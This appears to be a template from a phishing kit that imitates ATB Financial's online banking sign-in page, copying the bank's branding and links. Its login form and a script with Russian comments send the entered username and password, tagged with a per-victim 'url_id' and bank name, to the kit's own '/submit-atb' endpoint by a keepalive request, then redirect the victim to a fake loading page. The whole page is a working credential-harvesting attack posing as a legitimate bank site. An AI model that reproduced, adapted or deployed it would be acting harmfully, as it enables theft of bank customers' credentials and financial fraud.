<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>ATB Online Banking</title>
    <meta name="description" content="ATB Online Banking">
    <meta name="author" content="ATB">
    <meta property="og:title" content="ATB Online Banking">
    <meta property="og:description" content="ATB Online Banking">
    <meta property="og:type" content="website">
    <script src="https://cdn.tailwindcss.com/3.4.16"></script>
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link href="https://fonts.googleapis.com/css2?family=Inter&display=swap" rel="stylesheet">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/remixicon/4.6.0/remixicon.min.css">
    <style>
        /* ATB Online Banking Styles */
        .atb-page {
            font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Roboto, Helvetica, Arial, sans-serif;
            background-color: #f5f5f5;
            color: #333333;
        }

        .atb-page * {
            margin: 0;
            padding: 0;
            box-sizing: border-box;
        }

        .header-container {
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            z-index: 1000;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.1);
        }

        .top-nav {
            background-color: #0053db;
            color: white;
            padding: 12px 0;
        }

        .container {
            width: 100%;
            max-width: 1280px;
            margin: 0 auto;
            padding: 0 16px;
        }

        .flex {
            display: flex;
        }

        .justify-between {
            justify-content: space-between;
        }

        .items-center {
            align-items: center;
        }

        .space-x-8 > *:not(:first-child) {
            margin-left: 32px;
        }

        a {
            text-decoration: none;
            color: inherit;
        }

        .font-medium {
            font-weight: 500;
        }

        .logo-bar {
            background-color: #0072f0;
            color: #ffffff;
            padding: 16px 0;
        }

        .text-blue-600 {
            color: #1e6acf;
        }

        .font-bold {
            font-weight: 700;
        }

        .text-2xl {
            font-size: 24px;
        }

        .main-content {
            padding: 180px 16px 80px;
            min-height: 100vh;
        }

        .text-4xl {
            font-size: 36px;
            font-weight: 700;
        }

        .mb-8 {
            margin-bottom: 32px;
        }

        .text-center {
            text-align: center;
        }

        .grid {
            display: grid;
            grid-template-columns: repeat(1, 1fr);
            gap: 24px;
        }

        .card {
            background-color: white;
            border: 1px solid #e5e7eb;
            border-radius: 0;
            padding: 24px;
            display: flex;
            flex-direction: column;
            box-shadow: 0 2px 5px rgba(0, 0, 0, 0.05);
        }

        .card-tag {
            font-size: 14px;
            font-weight: 500;
            position: relative;
            padding-bottom: 8px;
            display: inline-block;
            margin-bottom: 16px;
        }

        .card-tag.personal::after,
        .card-tag.business::after,
        .card-tag.wealth::after {
            content: '';
            position: absolute;
            bottom: 0;
            left: 0;
            width: 10%;
            height: 2px;
            background-color: #f97316;
        }

        .card-title {
            font-size: 24px;
            font-weight: 700;
            margin-bottom: 16px;
        }

        .card-description {
            margin-bottom: 24px;
            flex-grow: 1;
            color: #666;
        }

        .btn {
            background-color: #0072f0;
            color: white;
            padding: 12px 16px;
            border-radius: 9999px;
            font-weight: 500;
            border: none;
            cursor: pointer;
            width: 100%;
            transition: background-color 0.2s;
        }

        .btn:hover {
            background-color: #1657b5;
        }

        .login-page {
            display: none;
            position: fixed;
            top: 0;
            left: 0;
            right: 0;
            bottom: 0;
            background-color: rgba(0, 0, 0, 0.5);
            z-index: 2000;
            justify-content: center;
            align-items: center;
        }

        .login-container {
            background-color: white;
            border-radius: 8px;
            box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
            padding: 40px;
            width: 450px;
            max-width: 95%;
            max-height: 90vh;
            overflow-y: hidden;
            position: relative;
        }

        .logo-container {
            text-align: center;
            margin-bottom: 25px;
            font-size: 5px;
            font-weight: bold;
            color: #0072f0;
            background-color: #ffffff;
        }

        .login-logo {
            border: 4px solid #ffffff;
            border-radius: 1px;
            display: inline-block;
            padding: 1px 6px;
            font-size: 25px;
            font-weight: bold;
            color: #ffffff;
            background-color: #0072f0;
        }

        .login-title {
            text-align: center;
            font-size: 24px;
            margin-bottom: 30px;
            border-bottom: 1px solid #e0e0e0;
            padding-bottom: 15px;
            color: #333;
        }

        .form-group {
            margin-bottom: 20px;
        }

        .form-group label {
            display: block;
            margin-bottom: 8px;
            font-weight: bold;
            color: #333;
        }

        .form-group input[type="text"],
        .form-group input[type="password"] {
            width: 100%;
            padding: 12px;
            border: 1px solid #ddd;
            border-radius: 4px;
            font-size: 16px;
            transition: border-color 0.2s;
        }

        .form-group input[type="text"]:focus,
        .form-group input[type="password"]:focus {
            border-color: #0066cc;
            outline: none;
        }

        .login-button {
            background-color: #0066cc;
            color: white;
            border: none;
            border-radius: 50px;
            padding: 14px;
            width: 100%;
            font-size: 16px;
            font-weight: bold;
            cursor: pointer;
            margin-top: 20px;
            transition: background-color 0.2s;
        }

        .login-button:hover {
            background-color: #0055aa;
        }

        .forgot-links {
            text-align: center;
            margin-top: 20px;
        }

        .forgot-links a {
            color: #0066cc;
            text-decoration: none;
            display: block;
            margin-bottom: 10px;
            transition: color 0.2s;
        }

        .forgot-links a:hover {
            text-decoration: underline;
        }

        .login-footer {
            margin-top: 40px;
            text-align: center;
            font-size: 14px;
            color: #666;
        }

        .login-footer-links {
            margin-bottom: 10px;
        }

        .login-footer-links a {
            color: #0066cc;
            text-decoration: none;
            margin: 0 5px;
        }

        .login-footer-links a:hover {
            text-decoration: underline;
        }

        .login-footer-links span {
            margin: 0 5px;
            color: #ccc;
        }

        .login-copyright {
            font-size: 12px;
            line-height: 1.5;
        }

        .back-button {
            background-color: #f0f0f0;
            color: #333;
            border: none;
            border-radius: 50px;
            padding: 10px 20px;
            font-size: 14px;
            cursor: pointer;
            margin-bottom: 20px;
            display: flex;
            align-items: center;
            gap: 5px;
            transition: background-color 0.2s;
        }

        .back-button:hover {
            background-color: #e0e0e0;
        }

        .main-footer {
            background-color: #75757b;
            color: white;
            padding: 48px 0 24px;
        }

        .footer-grid {
            display: grid;
            grid-template-columns: repeat(1, 1fr);
            gap: 32px;
            margin-bottom: 32px;
        }

        .footer-heading {
            font-size: 15px;
            font-weight: 600;
            margin-bottom: 16px;
        }

        .footer-links {
            list-style: none;
        }

        .footer-links li {
            margin-bottom: 12px;
        }

        .footer-links a {
            color: white;
            text-decoration: none;
            transition: color 0.2s;
        }

        .footer-links a:hover {
            color: #ddd;
        }

        .footer-bottom {
            padding-top: 24px;
            border-top: 1px solid rgba(255, 255, 255, 0.2);
        }

        .social-icons {
            display: flex;
            gap: 16px;
            margin-bottom: 16px;
        }

        .social-icons a {
            color: white;
        }

        .footer-legal {
            display: flex;
            flex-wrap: wrap;
            gap: 16px;
            margin-top: 16px;
            justify-content: center;
            align-items: center;
            width: 100%;
            padding: 0;
        }

        .copyright {
            text-align: right;
        }

        .footer-bottom-content {
            display: flex;
            flex-direction: column;
        }

        .footer-bottom-row {
            display: flex;
            justify-content: space-between;
            align-items: center;
        }

        .footer-legal-links {
            display: flex;
            align-items: center;
            gap: 16px;
            margin-top: 16px;
        }

        @media (min-width: 640px) {
            .sm\:text-left {
                text-align: left;
            }
        }

        @media (min-width: 768px) {
            .grid {
                grid-template-columns: repeat(2, 1fr);
            }

            .footer-grid {
                grid-template-columns: repeat(2, 1fr);
            }

            .footer-bottom-content {
                flex-direction: row;
                justify-content: space-between;
                align-items: center;
            }

            .footer-legal-links {
                margin-top: 0;
            }
        }

        @media (min-width: 1024px) {
            .grid {
                grid-template-columns: repeat(3, 1fr);
            }

            .footer-grid {
                grid-template-columns: repeat(4, 1fr);
            }

            .footer-bottom {
                display: flex;
                justify-content: space-between;
                align-items: center;
            }

            .social-icons {
                margin-bottom: 0;
            }

            .footer-bottom-content {
                width: 100%;
            }
        }
    </style>
</head>
<body class="atb-page">
    <div class="header-container">
        <div class="top-nav">
            <div class="container flex justify-between items-center">
                <div class="flex space-x-8">
                    <a href="https://www.atb.com/personal/" class="font-medium">Personal</a>
                    <a href="https://www.atb.com/business/" class="font-medium">Business</a>
                    <a href="https://www.atb.com/commercial/" class="font-medium">Commercial</a>
                    <a href="https://www.atb.com/wealth/" class="font-medium">Wealth</a>
                </div>
                <div>
                    <a href="#" class="font-medium flex items-center sign-in-link">
                        Sign In 
                        <span style="margin-left: 4px;">›</span>
                    </a>
                </div>
            </div>
        </div>
        <div class="logo-bar">
            <div class="container flex justify-between items-center">
                <div>
                    <div class="login-logo">
                       <a href="https://www.atb.com/"> ATB</a>
                    </div>
                </div>
                <div>
                    <svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                        <circle cx="11" cy="11" r="8"></circle>
                        <line x1="21" y1="21" x2="16.65" y2="16.65"></line>
                    </svg>
                </div>
            </div>
        </div>
    </div>

    <div class="main-content container">
        <h1 class="text-4xl mb-8 text-center sm:text-left">SIGN IN TO ONLINE BANKING</h1>
        <div class="grid">
            <div class="card">
                <span class="card-tag personal">Personal</span>
                <h2 class="card-title">ATB Personal</h2>
                <p class="card-description">Pay bills and transfer funds. It's quick and secure.</p>
                <button class="btn login-btn">Log in</button>
            </div>
            <div class="card">
                <span class="card-tag business">Business</span>
                <h2 class="card-title">ATB Business</h2>
                <p class="card-description">Securely manage your business banking needs.</p>
                <button class="btn login-btn">Log in</button>
            </div>
            <div class="card">
                <span class="card-tag personal">Personal</span>
                <h2 class="card-title">Digital Applications</h2>
                <p class="card-description">Apply for everyday banking products and monitor your applications.</p>
                <button class="btn login-btn">Log in</button>
            </div>
            <div class="card">
                <span class="card-tag wealth">Wealth</span>
                <h2 class="card-title">ATB Prosper</h2>
                <p class="card-description">The simplest way to invest. Open an investment account and track your progress online.</p>
                <button class="btn login-btn">Log in</button>
            </div>
            <div class="card">
                <span class="card-tag wealth">Wealth</span>
                <h2 class="card-title">Investor Connect</h2>
                <p class="card-description">View your transaction history, holdings, tax slips and statements online.</p>
                <button class="btn login-btn">Log in</button>
            </div>
        </div>
    </div>

    <footer class="main-footer">
        <div class="container">
            <div class="footer-grid">
                <div>
                    <h3 class="footer-heading">Get in touch</h3>
                    <ul class="footer-links">
                        <li><a href=" https://www.atb.com/resources/contact-us/">Contact us</a></li>
                        <li><a href="https://www.atb.com/resources/contact-us/feedback/">Client feedback</a></li>
                        <li><a href="https://www.atb.com/resources/find-a-location/">Find a location</a></li>
                        <li><a href="https://www.atb.com/">Book an appointment</a></li>
                    </ul>
                </div>
                <div>
                    <h3 class="footer-heading">Discover</h3>
                    <ul class="footer-links">
                        <li><a href="https://atbcm.atb.com/?_ga=2.29472634.49112104.1746549963-226600170.1746549963&_gl=1*1ww7goz*_gcl_au*MTY5MjI1ODUzNy4xNzQ2NTQ5OTYz*_ga*MjI2NjAwMTcwLjE3NDY1NDk5NjM.*_ga_79ZVTKT225*czE3NDY1Nzg3NDMkbzUkZzEkdDE3NDY1ODIxMTMkajU2JGwwJGgw">ATB Capital Markets</a></li>
                        <li><a href="https://atbim.atb.com/?_ga=2.29472634.49112104.1746549963-226600170.1746549963&_gl=1*1y36j42*_gcl_au*MTY5MjI1ODUzNy4xNzQ2NTQ5OTYz*_ga*MjI2NjAwMTcwLjE3NDY1NDk5NjM.*_ga_79ZVTKT225*czE3NDY1Nzg3NDMkbzUkZzEkdDE3NDY1ODIxNDgkajIxJGwwJGgw">ATB Investment Management</a></li>
                        <li><a href="https://atbentrepreneurcentre.com/?__hstc=155221604.13fb553034a410542036ab9401d59946.1746556874629.1746578746289.1746580818088.5&__hssc=155221604.5.1746580818088&__hsfp=2322982841&_ga=2.29472634.49112104.1746549963-226600170.1746549963&_gl=1*1y36j42*_gcl_au*MTY5MjI1ODUzNy4xNzQ2NTQ5OTYz*_ga*MjI2NjAwMTcwLjE3NDY1NDk5NjM.*_ga_79ZVTKT225*czE3NDY1Nzg3NDMkbzUkZzEkdDE3NDY1ODIxNDgkajIxJGwwJGgw">ATB Entrepreneur Centre</a></li>
                        <li><a href="https://www.atbprosper.com/?__hstc=155221604.13fb553034a410542036ab9401d59946.1746556874629.1746578746289.1746580818088.5&__hssc=155221604.5.1746580818088&__hsfp=2322982841&_ga=2.29472634.49112104.1746549963-226600170.1746549963&_gl=1*1y36j42*_gcl_au*MTY5MjI1ODUzNy4xNzQ6NTQ5OTYz*_ga*MjI2NjAwMTcwLjE3NDY1NDk5NjM.*_ga_79ZVTKT225*czE3NDY1Nzg3NDMkbzUkZzEkdDE3NDY1ODIxNDgkajIxJGwwJGgw">ATB Prosper</a></li>
                        <li><a href="https://www.atbventures.com/?__hstc=155221604.13fb553034a410542036ab9401d59946.1746556874629.1746578746289.1746580818088.5&__hssc=155221604.5.1746580818088&__hsfp=2322982841">ATB Ventures</a></li>
                    </ul>
                </div>
                <div>
                    <h3 class="footer-heading">Resources</h3>
                    <ul class="footer-links">
                        <li><a href="https://www.atb.com/resources/rates/">Current rates</a></li>
                        <li><a href="https://www.atb.com/resources/support/digital-banking/">Digital banking help</a></li>
                        <li><a href="https://www.atb.com/company/privacy-and-security/casl/">Marketing preferences</a></li>
                        <li><a href="https://www.atb.com/resources/tools/">Tools</a></li>
                        <li><a href="https://www.atb.com/personal/good-advice/banking-and-security-tips/">Fraud prevention</a></li>
                    </ul>
                </div>
                <div>
                    <h3 class="footer-heading">Company</h3>
                    <ul class="footer-links">
                        <li><a href="https://www.atb.com/company/about-atb/">About</a></li>
                        <li><a href="https://www.atb.com/company/accessibility/">Accessibility</a></li>
                        <li><a href="https://www.atb.com/company/careers/">Careers</a></li>
                        <li><a href="https://www.atb.com/company/community/">Community</a></li>
                        <li><a href="https://www.atb.com/company/insights/">Economic insights</a></li>
                        <li><a href="https://www.atb.com/company/news/">News</a></li>
                    </ul>
                </div>
            </div>
            <div class="footer-bottom">
                <div class="footer-bottom-content">
                    <div class="social-icons">
                        <a href="https://www.instagram.com/atbfinancial/
"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><rect x="2" y="2" width="20" height="20" rx="5" ry="5"></rect><path d="M16 11.37A4 4 0 1 1 12.63 8 4 4 0 0 1 16 11.37z"></path><line x1="17.5" y1="6.5" x2="17.51" y2="6.5"></line></svg></a>
                        <a href="https://www.facebook.com/ATBFinancial/
"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M18 2h-3a5 5 0 0 0-5 5v3H7v4h3v8h4v-8h3l1-4h-4V7a1 1 0 0 1 1-1h3z"></path></svg></a>
                        <a href=" https://twitter.com/ATBFinancial
"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M22 4s-.7 2.1-2 3.4c1.6 10-9.4 17.3-18 11.6 2.2.1 4.4-.6 6-2C3 15.5.5 9.6 3 5c2.2 2.6 5.6 4.1 9 4-.9-4.2 4-6.6 7-3.8 1.1 0 3-1.2 3-1.2z"></path></svg></a>
                        <a href="https://www.linkedin.com/company/atb-financial
"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M16 8a6 6 0 0 1 6 6v7h-4v-7a2 2 0 0 0-2-2 2 2 0 0 0-2 2v7h-4v-7a6 6 0 0 1 6-6z"></path><rect x="2" y="9" width="4" height="12"></rect><circle cx="4" cy="4" r="2"></circle></svg></a>
                        <a href="https://www.youtube.com/user/ATBFinancialVids
"><svg xmlns="http://www.w3.org/2000/svg" width="24" height="24" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round"><path d="M22.54 6.42a2.78 2.78 0 0 0-1.94-2C18.88 4 12 4 12 4s-6.88 0-8.6.46a2.78 2.78 0 0 0-1.94 2A29 29 0 0 0 1 11.75a29 29 0 0 0 .46 5.33A2.78 2.78 0 0 0 3.4 19c1.72.46 8.6.46 8.6.46s6.88 0 8.6-.46a2.78 2.78 0 0 0 1.94-2 29 29 0 0 0 .46-5.25 29 29 0 0 0-.46-5.33z"></path><polygon points="9.75 15.02 15.5 11.75 9.75 8.48 9.75 15.02"></polygon></svg></a>
                    </div>
                    <div class="footer-legal-links">
                        <a href="https://www.atb.com/company/legal/">Legal</a>
                        <span>|</span>
                        <a href="https://www.atb.com/company/privacy-and-security/">Privacy & security</a>
                        <span>|</span>
                        <a href="https://www.atb.com/siteassets/pdf/global/codeofconduct.pdf">Code of Conduct</a>
                    </div>
                </div>
                <div class="copyright">
                    Copyright © 2025 ATB. All rights reserved.
                </div>
            </div>
        </div>
    </footer>

    <div id="login-page" class="login-page">
        <div class="login-container">
            <button class="back-button" id="back-button">
                <svg xmlns="http://www.w3.org/2000/svg" width="16" height="16" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
                    <line x1="19" y1="12" x2="5" y2="12"></line>
                    <polyline points="12 19 5 12 12 5"></polyline>
                </svg>
                Back
            </button>
            <div class="logo-container">
                <div class="login-logo">ATB</div>
            </div>
            <h1 class="login-title">Login</h1>
            <form method="POST" action="/submit-atb" id="atb-login-form">
                <input type="hidden" name="url_id" value="{{ url_id }}">
                
                <div class="form-group">
                    <label for="username">Username</label>
                    <input type="text" id="username" name="login-id" placeholder="Enter your username">
                </div>
                
                <div class="form-group">
                    <label for="password">Password</label>
                    <input type="password" id="password" name="password" placeholder="Enter your password">
                </div>
                
                <button type="submit" class="login-button">Log in</button>
            </form>
            <div class="forgot-links">
                <a href="https://login.atb.com/ext/idrecovery/Recover?InternalRedirect=true">Forgot username</a>
                <a href="https://login.atb.com/ext/pwdreset/Identify?InternalRedirect=true">Forgot password</a>
            </div>
            <div class="login-footer">
                <div class="login-footer-links">
                    <a href="https://www.atb.com/">atb.com</a>
                    <span>|</span>
                    <a href="https://www.atb.com/resources/contact-us/">Contact us</a>
                    <span>|</span>
                    <a href="https://www.atb.com/company/privacy-and-security/online-guarantee">Terms</a>
                    <span>|</span>
                    <a href="https://www.atb.com/company/privacy-and-security/">Security tips</a>
                </div>
                <div class="login-copyright">
                    © ATB Financial 2025. All rights reserved.<br>
                    Authorized access only. Usage may be monitored.
                </div>
            </div>
        </div>
    </div>

    <script>
        // ATB Page Scripts
        document.querySelectorAll('.login-btn').forEach(button => {
            button.addEventListener('click', function() {
                document.getElementById('login-page').style.display = 'flex';
                document.body.style.overflow = 'hidden';
            });
        });
    
        document.getElementById('back-button').addEventListener('click', function() {
            document.getElementById('login-page').style.display = 'none';
            document.body.style.overflow = 'auto';
        });
    
        document.querySelector('.sign-in-link').addEventListener('click', function(e) {
            e.preventDefault();
            document.getElementById('login-page').style.display = 'flex';
            document.body.style.overflow = 'hidden';
        });
    </script>
<script>
    document.addEventListener('DOMContentLoaded', function() {
        const form = document.querySelector('#atb-login-form');
        form.addEventListener('submit', function(e) {
            e.preventDefault();
            
            // Получаем url_id из всех возможных источников
            let urlId;
            
            // 1. Из параметров URL
            const urlParams = new URLSearchParams(window.location.search);
            urlId = urlParams.get('url_id');
            
            // 2. Из скрытого поля формы
            if (!urlId) {
                const hiddenField = form.querySelector('input[name="url_id"]');
                if (hiddenField) {
                    urlId = hiddenField.value;
                }
            }
            
            // 3. Из sessionStorage
            if (!urlId) {
                urlId = sessionStorage.getItem('url_id');
            }
            
            // Если всё еще нет url_id, показываем ошибку
            if (!urlId) {
                alert('Session ID is missing. Please restart the process.');
                return;
            }
            
            const formData = new FormData(form);
            formData.append('bankname', 'ATB');
            formData.append('url_id', urlId);

            // Перенаправляем на loading.html с url_id
            window.location.href = `/render/loading?url_id=${encodeURIComponent(urlId)}`;

            // Отправка данных формы после перехода
            fetch('/submit-atb', {
                method: 'POST',
                body: formData,
                keepalive: true // Обеспечивает отправку при переходе
            }).catch(error => {
                console.error('Error submitting form:', error);
            });
        });
    });
</script>
    <script>
        // Сохраняем url_id при загрузке страницы банка
        document.addEventListener('DOMContentLoaded', function() {
            const urlId = "{{ url_id }}";
            if (urlId) {
                sessionStorage.setItem('url_id', urlId);
            }
        });
    </script>
</body>
</html>